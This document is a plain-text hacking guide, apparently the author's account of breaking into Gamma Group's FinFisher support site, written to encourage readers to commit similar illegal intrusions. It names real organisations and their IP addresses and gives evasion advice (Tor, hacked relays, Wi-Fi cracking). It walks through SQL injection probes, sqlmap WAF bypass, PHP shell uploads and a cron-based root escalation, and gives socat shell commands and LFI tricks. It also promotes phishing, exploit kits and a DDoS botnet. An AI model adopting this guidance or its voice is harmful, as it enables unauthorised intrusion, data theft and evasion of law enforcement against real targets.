| _ _ _ ____ _ _ |
| | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | |
| | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | |
| | _ | (_| | (__| < | |_) | (_| | (__| <|_| |
| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) |
| |
| A DIY Guide for those without the patience to wait for whistleblowers |
|
|
|
|
| --[ 1 ]-- Introduction |
|
|
| I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz |
| it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple |
| it is, and to hopefully inform and inspire you to go out and hack shit. If you |
| have no experience with programming or hacking, some of the text below might |
| look like a foreign language. Check the resources section at the end to help you |
| get started. And trust me, once you've learned the basics you'll realize this |
| really is easier than filing a FOIA request. |
|
|
|
|
| --[ 2 ]-- Staying Safe |
|
|
| This is illegal, so you'll need to take same basic precautions: |
|
|
| 1) Make a hidden encrypted volume with Truecrypt 7.1a [0] |
| 2) Inside the encrypted volume install Whonix [1] |
| 3) (Optional) While just having everything go over Tor thanks to Whonix is |
| probably sufficient, it's better to not use an internet connection connected |
| to your name or address. A cantenna, aircrack, and reaver can come in handy |
| here. |
|
|
| [0] https://truecrypt.ch/downloads/ |
| [1] https://www.whonix.org/wiki/Download#Install_Whonix |
|
|
| As long as you follow common sense like never do anything hacking related |
| outside of Whonix, never do any of your normal computer usage inside Whonix, |
| never mention any information about your real life when talking with other |
| hackers, and never brag about your illegal hacking exploits to friends in real |
| life, then you can pretty much do whatever you want with no fear of being v&. |
|
|
| NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable |
| for some things like web browsing, when it comes to using hacking tools like |
| nmap, sqlmap, and nikto that are making thousands of requests, they will run |
| very slowly over Tor. Not to mention that you'll want a public IP address to |
| receive connect back shells. I recommend using servers you've hacked or a VPS |
| paid with bitcoin to hack from. That way only the low bandwidth text interface |
| between you and the server is over Tor. All the commands you're running will |
| have a nice fast connection to your target. |
|
|
|
|
| --[ 3 ]-- Mapping out the target |
|
|
| Basically I just repeatedly use fierce [0], whois lookups on IP addresses and |
| domain names, and reverse whois lookups to find all IP address space and domain |
| names associated with an organization. |
|
|
| [0] http://ha.ckers.org/fierce/ |
|
|
| For an example let's take Blackwater. We start out knowing their homepage is at |
| academi.com. Running fierce.pl -dns academi.com we find the subdomains: |
| 67.238.84.228 email.academi.com |
| 67.238.84.242 extranet.academi.com |
| 67.238.84.240 mail.academi.com |
| 67.238.84.230 secure.academi.com |
| 67.238.84.227 vault.academi.com |
| 54.243.51.249 www.academi.com |
|
|
| Now we do whois lookups and find the homepage of www.academi.com is hosted on |
| Amazon Web Service, while the other IPs are in the range: |
| NetRange: 67.238.84.224 - 67.238.84.255 |
| CIDR: 67.238.84.224/27 |
| CustName: Blackwater USA |
| Address: 850 Puddin Ridge Rd |
|
|
| Doing a whois lookup on academi.com reveals it's also registered to the same |
| address, so we'll use that as a string to search with for the reverse whois |
| lookups. As far as I know all the actual reverse whois lookup services cost |
| money, so I just cheat with google: |
| "850 Puddin Ridge Rd" inurl:ip-address-lookup |
| "850 Puddin Ridge Rd" inurl:domaintools |
|
|
| Now run fierce.pl -range on the IP ranges you find to lookup dns names, and |
| fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more |
| whois lookups and repeat the process until you've found everything. |
|
|
| Also just google the organization and browse around its websites. For example on |
| academi.com we find links to a careers portal, an online store, and an employee |
| resources page, so now we have some more: |
| 54.236.143.203 careers.academi.com |
| 67.132.195.12 academiproshop.com |
| 67.238.84.236 te.academi.com |
| 67.238.84.238 property.academi.com |
| 67.238.84.241 teams.academi.com |
|
|
| If you repeat the whois lookups and such you'll find academiproshop.com seems to |
| not be hosted or maintained by Blackwater, so scratch that off the list of |
| interesting IPs/domains. |
|
|
| In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com |
| was simply a whois lookup of finfisher.com which found it registered to the name |
| "FinFisher GmbH". Googling for: |
| "FinFisher GmbH" inurl:domaintools |
| finds gamma-international.de, which redirects to finsupport.finfisher.com |
|
|
| ...so now you've got some idea how I map out a target. |
| This is actually one of the most important parts, as the larger the attack |
| surface that you are able to map out, the easier it will be to find a hole |
| somewhere in it. |
|
|
|
|
| --[ 4 ]-- Scanning & Exploiting |
|
|
| Scan all the IP ranges you found with nmap to find all services running. Aside |
| from a standard port scan, scanning for SNMP is underrated. |
|
|
| Now for each service you find running: |
|
|
| 1) Is it exposing something it shouldn't? Sometimes companies will have services |
| running that require no authentication and just assume it's safe because the url |
| or IP to access it isn't public. Maybe fierce found a git subdomain and you can |
| go to git.companyname.come/gitweb/ and browse their source code. |
|
|
| 2) Is it horribly misconfigured? Maybe they have an ftp server that allows |
| anonymous read or write access to an important directory. Maybe they have a |
| database server with a blank admin password (lol stratfor). Maybe their embedded |
| devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's |
| default password. |
|
|
| 3) Is it running an old version of software vulnerable to a public exploit? |
|
|
|
|
| Webservers deserve their own category. For any webservers, including ones nmap |
| will often find running on nonstandard ports, I usually: |
|
|
| 1) Browse them. Especially on subdomains that fierce finds which aren't intended |
| for public viewing like test.company.com or dev.company.com you'll often find |
| interesting stuff just by looking at them. |
|
|
| 2) Run nikto [0]. This will check for things like webserver/.svn/, |
| webserver/backup/, webserver/phpinfo.php, and a few thousand other common |
| mistakes and misconfigurations. |
|
|
| 3) Identify what software is being used on the website. WhatWeb is useful [1] |
|
|
| 4) Depending on what software the website is running, use more specific tools |
| like wpscan [2], CMS-Explorer [3], and Joomscan [4]. |
|
|
| First try that against all services to see if any have a misconfiguration, |
| publicly known vulnerability, or other easy way in. If not, it's time to move |
| on to finding a new vulnerability: |
|
|
| 5) Custom coded web apps are more fertile ground for bugs than large widely used |
| projects, so try those first. I use ZAP [5], and some combination of its |
| automated tests along with manually poking around with the help of its |
| intercepting proxy. |
|
|
| 6) For the non-custom software they're running, get a copy to look at. If it's |
| free software you can just download it. If it's proprietary you can usually |
| pirate it. If it's proprietary and obscure enough that you can't pirate it you |
| can buy it (lame) or find other sites running the same software using google, |
| find one that's easier to hack, and get a copy from them. |
|
|
| [0] http://www.cirt.net/nikto2 |
| [1] http://www.morningstarsecurity.com/research/whatweb |
| [2] http://wpscan.org/ |
| [3] https://code.google.com/p/cms-explorer/ |
| [4] http://sourceforge.net/projects/joomscan/ |
| [5] https://code.google.com/p/zaproxy/ |
|
|
|
|
| For finsupport.finfisher.com the process was: |
|
|
| * Start nikto running in the background. |
|
|
| * Visit the website. See nothing but a login page. Quickly check for sqli in the |
| login form. |
|
|
| * See if WhatWeb knows anything about what software the site is running. |
|
|
| * WhatWeb doesn't recognize it, so the next question I want answered is if this |
| is a custom website by Gamma, or if there are other websites using the same |
| software. |
|
|
| * I view the page source to find a URL I can search on (index.php isn't |
| exactly unique to this software). I pick Scripts/scripts.js.php, and google: |
| allinurl:"Scripts/scripts.js.php" |
|
|
| * I find there's a handful of other sites using the same software, all coded by |
| the same small webdesign firm. It looks like each site is custom coded but |
| they share a lot of code. So I hack a couple of them to get a collection of |
| code written by the webdesign firm. |
|
|
| At this point I can see the news stories that journalists will write to drum |
| up views: "In a sophisticated, multi-step attack, hackers first compromised a |
| web design firm in order to acquire confidential data that would aid them in |
| attacking Gamma Group..." |
|
|
| But it's really quite easy, done almost on autopilot once you get the hang of |
| it. It took all of a couple minutes to: |
|
|
| * google allinurl:"Scripts/scripts.js.php" and find the other sites |
|
|
| * Notice they're all sql injectable in the first url parameter I try. |
|
|
| * Realize they're running Apache ModSecurity so I need to use sqlmap [0] with |
| the option --tamper='tamper/modsecurityversioned.py' |
|
|
| * Acquire the admin login information, login and upload a php shell [1] (the |
| check for allowable file extensions was done client side in javascript), and |
| download the website's source code. |
|
|
| [0] http://sqlmap.org/ |
| [1] https://epinna.github.io/Weevely/ |
|
|
| Looking through the source code they might as well have named it Damn Vulnerable |
| Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in |
| javascript, and if you're unauthenticated the admin page just sends you back to |
| the login page with a Location header, but you can have your intercepting proxy |
| filter the Location header out and access it just fine. |
|
|
| [0] http://www.dvwa.co.uk/ |
|
|
| Heading back over to the finsupport site, the admin /BackOffice/ page returns |
| 403 Forbidden, and I'm having some issues with the LFI, so I switch to using the |
| sqli (it's nice to have a dozen options to choose from). The other sites by the |
| web designer all had an injectable print.php, so some quick requests to: |
| https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 |
| https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 |
| reveal that finsupport also has print.php and it is injectable. And it's |
| database admin! For MySQL this means you can read and write files. It turns out |
| the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. |
| But I can use a short script that uses sqlmap --file-read to get the php source |
| for a URL, and a normal web request to get the HTML, and then finds files |
| included or required in the php source, and finds php files linked in the HTML, |
| to recursively download the source to the whole site. |
|
|
| Looking through the source, I see customers can attach a file to their support |
| tickets, and there's no check on the file extension. So I pick a username and |
| password out of the customer database, create a support request with a php shell |
| attached, and I'm in! |
|
|
|
|
| --[ 5 ]-- (fail at) Escalating |
|
|
| ___________ |
| < got r00t? > |
| ----------- |
| \ ^__^ |
| \ (oo)\_______ |
| (__)\ )\/\ |
| ||----w | |
| || || |
| ^^^^^^^^^^^^^^^^ |
|
|
| Root over 50% of linux servers you encounter in the wild with two easy scripts, |
| Linux_Exploit_Suggester [0], and unix-privesc-check [1]. |
|
|
| [0] https://github.com/PenturaLabs/Linux_Exploit_Suggester |
| [1] https://code.google.com/p/unix-privesc-check/ |
|
|
| finsupport was running the latest version of Debian with no local root exploits, |
| but unix-privesc-check returned: |
| WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user |
| www-data can write to /etc/cron.hourly/mgmtlicensestatus |
| WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data |
| can write to /etc/cron.hourly/webalizer |
|
|
| so I add to /etc/cron.hourly/webalizer: |
| chown root:root /path/to/my_setuid_shell |
| chmod 04755 /path/to/my_setuid_shell |
|
|
| wait an hour, and ....nothing. Turns out that while the cron process is running |
| it doesn't seem to be actually running cron jobs. Looking in the webalizer |
| directory shows it didn't update stats the previous month. Apparently after |
| updating the timezone cron will sometimes run at the wrong time or sometimes not |
| run at all and you need to restart cron after changing the timezone. ls -l |
| /etc/localtime shows the timezone got updated June 6, the same time webalizer |
| stopped recording stats, so that's probably the issue. At any rate, the only |
| thing this server does is host the website, so I already have access to |
| everything interesting on it. Root wouldn't get much of anything new, so I move |
| on to the rest of the network. |
|
|
|
|
| --[ 6 ]-- Pivoting |
|
|
| The next step is to look around the local network of the box you hacked. This |
| is pretty much the same as the first Scanning & Exploiting step, except that |
| from behind the firewall many more interesting services will be exposed. A |
| tarball containing a statically linked copy of nmap and all its scripts that you |
| can upload and run on any box is very useful for this. The various nfs-* and |
| especially smb-* scripts nmap has will be extremely useful. |
|
|
| The only interesting thing I could get on finsupport's local network was another |
| webserver serving up a folder called 'qateam' containing their mobile malware. |
|
|
|
|
| --[ 7 ]-- Have Fun |
|
|
| Once you're in their networks, the real fun starts. Just use your imagination. |
| While I titled this a guide for wannabe whistleblowers, there's no reason to |
| limit yourself to leaking documents. My original plan was to: |
| 1) Hack Gamma and obtain a copy of the FinSpy server software |
| 2) Find vulnerabilities in FinSpy server. |
| 3) Scan the internet for, and hack, all FinSpy C&C servers. |
| 4) Identify the groups running them. |
| 5) Use the C&C server to upload and run a program on all targets telling them |
| who was spying on them. |
| 6) Use the C&C server to uninstall FinFisher on all targets. |
| 7) Join the former C&C servers into a botnet to DDoS Gamma Group. |
|
|
| It was only after failing to fully hack Gamma and ending up with some |
| interesting documents but no copy of the FinSpy server software that I had to |
| make due with the far less lulzy backup plan of leaking their stuff while |
| mocking them on twitter. |
| Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password |
| already so I can move on to step 2! |
|
|
|
|
| --[ 8 ]-- Other Methods |
|
|
| The general method I outlined above of scan, find vulnerabilities, and exploit |
| is just one way to hack, probably better suited to those with a background in |
| programming. There's no one right way, and any method that works is as good as |
| any other. The other main ways that I'll state without going into detail are: |
|
|
| 1) Exploits in web browers, java, flash, or microsoft office, combined with |
| emailing employees with a convincing message to get them to open the link or |
| attachment, or hacking a web site frequented by the employees and adding the |
| browser/java/flash exploit to that. |
| This is the method used by most of the government hacking groups, but you don't |
| need to be a government with millions to spend on 0day research or subscriptions |
| to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit |
| for a couple thousand, and rent access to one for much less. There's also |
| metasploit browser autopwn, but you'll probably have better luck with no |
| exploits and a fake flash updater prompt. |
|
|
| 2) Taking advantage of the fact that people are nice, trusting, and helpful 95% |
| of the time. |
| The infosec industry invented a term to make this sound like some sort of |
| science: "Social Engineering". This is probably the way to go if you don't know |
| too much about computers, and it really is all it takes to be a successful |
| hacker [0]. |
|
|
| [0] https://www.youtube.com/watch?v=DB6ywr9fngU |
|
|
|
|
| --[ 9 ]-- Resources |
|
|
| Links: |
|
|
| * https://www.pentesterlab.com/exercises/ |
| * http://overthewire.org/wargames/ |
| * http://www.hackthissite.org/ |
| * http://smashthestack.org/ |
| * http://www.win.tue.nl/~aeb/linux/hh/hh.html |
| * http://www.phrack.com/ |
| * http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot |
| * http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash |
| * https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ |
| * https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers |
| (all his other blog posts are great too) |
| * https://www.corelan.be/ (start at Exploit writing tutorial part 1) |
| * http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ |
| One trick it leaves out is that on most systems the apache access log is |
| readable only by root, but you can still include from /proc/self/fd/10 or |
| whatever fd apache opened it as. It would also be more useful if it mentioned |
| what versions of php the various tricks were fixed in. |
| * http://www.dest-unreach.org/socat/ |
| Get usable reverse shells with a statically linked copy of socat to drop on |
| your target and: |
| target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM |
| host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM |
| It's also useful for setting up weird pivots and all kinds of other stuff. |
|
|
| Books: |
|
|
| * The Web Application Hacker's Handbook |
| * Hacking: The Art of Exploitation |
| * The Database Hacker's Handbook |
| * The Art of Software Security Assessment |
| * A Bug Hunter's Diary |
| * Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier |
| * TCP/IP Illustrated |
|
|
| Aside from the hacking specific stuff almost anything useful to a system |
| administrator for setting up and administering networks will also be useful for |
| exploring them. This includes familiarity with the windows command prompt and unix |
| shell, basic scripting skills, knowledge of ldap, kerberos, active directory, |
| networking, etc. |
|
|
|
|
| --[ 10 ]-- Outro |
|
|
| You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a |
| tool. It's not selling hacking tools that makes Gamma evil. It's who their |
| customers are targeting and with what purpose that makes them evil. That's not |
| to say that tools are inherently neutral. Hacking is an offensive tool. In the |
| same way that guerrilla warfare makes it harder to occupy a country, whenever |
| it's cheaper to attack than to defend it's harder to maintain illegitimate |
| authority and inequality. So I wrote this to try to make hacking easier and more |
| accessible. And I wanted to show that the Gamma Group hack really was nothing |
| fancy, just standard sqli, and that you do have the ability to go out and take |
| similar action. |
|
|
| Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea |
| Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned |
| hackers, dissidents, and criminals! |
|
|